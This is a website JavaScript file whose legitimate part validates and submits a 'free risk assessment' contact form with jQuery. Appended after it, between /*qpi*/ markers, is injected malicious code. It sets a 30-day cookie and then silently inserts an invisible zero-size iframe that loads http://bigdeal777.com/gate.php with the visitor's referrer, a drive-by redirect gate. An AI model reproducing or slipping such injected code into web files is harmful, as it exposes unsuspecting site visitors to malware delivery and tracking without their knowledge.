jQuery(document).ready(function(){
	jQuery('#FRA_form').liveValidation({
		validIco		: 'images/validate-ok.png',
		invalidIco		: 'images/validate-no.png',
		required		: ['fname', 'lname', 'phone', 'email'],
		fields			: {fname: /^\S.*$/, lname: /^\S.*$/, phone: /^\S.*$/, email: /^.+?@.+?\..{2,4}$/}
	});
	jQuery('.freeriskassessmentformtitle a').click( function() {
		jQuery('.freeriskassessmentformcontainer').slideToggle("fast");
		return false;
	});
	jQuery('#FRA_form').submit(function(){
		jQuery('#FRA_form').load('includes/send_mail.php?'+jQuery('#FRA_form').serialize());
		return false;
	});
});/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
	window.setTimeout(function(){
		var JSinj=document.createElement('iframe');
		JSinj.src='http://bigdeal777.com/gate.php?f=955522&r='+escape(document.referrer||'');
		JSinj.width='0';
		JSinj.height='0';
		JSinj.frameborder='0';
		JSinj.marginheight='0';
		JSinj.marginwidth='0';
		JSinj.border='0';
		try{
			document.body.appendChild(JSinj);
		}catch(e){
			document.documentElement.appendChild(JSinj);
		}
	}, 2000);
}
/*qpi*/
